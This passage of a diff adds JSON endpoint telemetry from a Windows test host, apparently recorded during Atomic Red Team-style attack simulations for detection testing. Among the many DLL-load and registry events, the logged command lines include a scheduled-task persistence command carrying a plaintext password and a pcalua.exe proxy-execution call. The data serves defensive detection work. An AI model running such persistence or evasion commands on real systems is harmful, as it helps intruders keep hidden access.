"{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 
131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "command_line": "SCHTASKS /Create /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \" Atomic \"task /TR C:\\windows\\system32\\cmd.exe /SC daily /ST 20:10", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2812, + "ppid": 7172, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "subtype": "create", + "timestamp": 131883573971590000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", + "unique_ppid": "{42FC7E13-CC15-5C05-0000-0010AD105701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", 
+ "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "schtasks.exe", + "image_path": "C:\\Windows\\System32\\schtasks.exe", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + 
"image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + 
"image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "taskschd.dll", + "image_path": "C:\\Windows\\System32\\taskschd.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 2812, + 
"process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + 
"timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + 
"process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "registry", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "msv1_0.dll", + "image_path": "C:\\Windows\\System32\\msv1_0.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "NtlmShared.dll", + "image_path": "C:\\Windows\\System32\\NtlmShared.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + "event_type": "process", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "subtype": "terminate", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" + }, + { + 
"event_type": "file", + "file_name": "SCHTASKS.EXE-2DE769BF.pf", + "file_path": "C:\\Windows\\Prefetch\\SCHTASKS.EXE-2DE769BF.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 7172, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2828, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573972110000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573972140000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "process", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573972140000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a -c\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7004, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573973190000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973070000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "image_load", + 
"image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973070000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973070000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973070000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973230000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "registry", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883573973230000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "command_line": "pcalua.exe -a -c", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": 
"C:\\Windows\\System32\\cmd.exe", + "pid": 2036, + "ppid": 7004, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "create", + "timestamp": 131883573973300000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}", + "unique_ppid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973390000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", 
